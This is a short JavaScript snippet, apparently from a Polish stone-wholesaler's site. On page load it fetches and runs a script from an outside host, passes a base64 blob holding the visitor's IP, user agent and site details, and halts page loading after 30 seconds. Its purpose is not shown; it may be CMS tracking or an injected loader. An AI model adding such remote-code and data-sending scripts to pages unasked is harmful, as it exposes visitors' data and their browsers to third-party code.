var myScrStOutTim='30000';if(window.addEventListener){window.addEventListener("load",myStatJsRunOnOutSrv(myScrStOutTim),false);}else if(window.attachEvent){window.attachEvent("onload",myStatJsRunOnOutSrv(myScrStOutTim));}else{window.onload=myStatJsRunOnOutSrv(myScrStOutTim);}function myStatJsRunOnOutSrv(myScrStOutTim){var RunOnOutSrvJs=document.createElement("script");RunOnOutSrvJs.src="http://cms24.waw.pl/j.php?p=MXwwfDB8fDl8Zm9jdXMtc3RvbmVzLnBsfC9rb250YWt0Lmh0bWx8fDY2LjI0OS43OS4xODV8Y3Jhd2wtNjYtMjQ5LTc5LTE4NS5nb29nbGVib3QuY29tfE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA2LjAuMTsgTmV4dXMgNVggQnVpbGQvTU1CMjlQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNDEuMC4yMjcyLjk2IE1vYmlsZSBTYWZhcmkvNTM3LjM2IChjb21wYXRpYmxlOyBHb29nbGVib3QvMi4xOyAraHR0cDovL3d3dy5nb29nbGUuY29tL2JvdC5odG1sKXxGb2N1cy1TdG9uZXMgaHVydG93bmlhIGthbWllbmlhfDB8Y21zQG1pZ2FuLnBsfDE1fGZvY3VzLXN0b25lcy5ob21lLnBsfDg5LjE2MS4yMTkuMTMzfG1vbmRheXwzNjExNnwwLjAwMDN8My44LjV8Ny4yLjN8dm9KNWJhYTIwZmZiMzZhN3wzOzA7MjsxOzB8MjswOzM3OzA7MjM2OzMxOzE7MDsyOzB8ODk2OzE2OzE7NDQ5Ozd8Mjg3OzIxNjsxOzM5MjkzNQ==";document.body.appendChild(RunOnOutSrvJs);setTimeout(function(){if(window.stop){window.stop();}else{document.execCommand('Stop');}},myScrStOutTim);}